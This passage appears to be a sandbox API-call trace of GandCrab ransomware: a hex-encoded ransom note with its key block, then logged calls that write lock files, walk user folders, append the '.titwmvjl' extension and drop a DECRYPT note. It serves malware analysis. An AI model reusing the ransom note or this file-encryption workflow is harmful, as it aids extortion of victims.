\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0096.249] WriteFile (in: hFile=0x2ac, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259f274, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259f274*=0x2162, lpOverlapped=0x0) returned 1 [0096.250] CloseHandle (hObject=0x2ac) returned 1 [0096.250] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.250] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.251] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x29, wMilliseconds=0x236)) [0096.251] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.251] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0096.251] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0096.251] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned 57 [0096.251] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\default\\appdata\\roaming\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2ac [0096.253] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.253] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.254] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\") returned 33 [0096.254] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\*" [0096.254] FindFirstFileExW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\*", fInfoLevelId=0x1, lpFindFileData=0x259f290, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259f290) returned 0x5034f8 [0096.254] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0096.254] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.255] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0096.255] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0096.255] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.255] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0096.255] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0096.255] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock" [0096.255] lstrlenW (lpString=".titwmvjl") returned 9 [0096.255] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned 57 [0096.255] VirtualAlloc (lpAddress=0x0, dwSize=0xb2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.255] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 66 [0096.255] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\d2ca4a09d2ca4deb61a.lock") returned 57 [0096.255] lstrlenW (lpString=".lock") returned 5 [0096.255] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0096.256] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0096.256] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.256] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.256] FindNextFileW (in: hFindFile=0x5034f8, lpFindFileData=0x259f290 | out: lpFindFileData=0x259f290) returned 1 [0096.256] lstrcmpW (lpString1="Microsoft", lpString2=".") returned 1 [0096.256] lstrcmpW (lpString1="Microsoft", lpString2="..") returned 1 [0096.256] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\", lpString2="Microsoft" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft" [0096.256] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft", lpString2="\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\" [0096.257] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0096.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.257] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0096.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.257] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0096.257] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.258] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0096.258] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0096.258] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0096.258] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0096.258] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0096.258] wsprintfW (in: param_1=0x1e70200, param_2="%s\\%s-DECRYPT.txt" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\TITWMVJL-DECRYPT.txt") returned 64 [0096.258] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\\\TITWMVJL-DECRYPT.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\titwmvjl-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2b4 [0096.260] lstrlenW 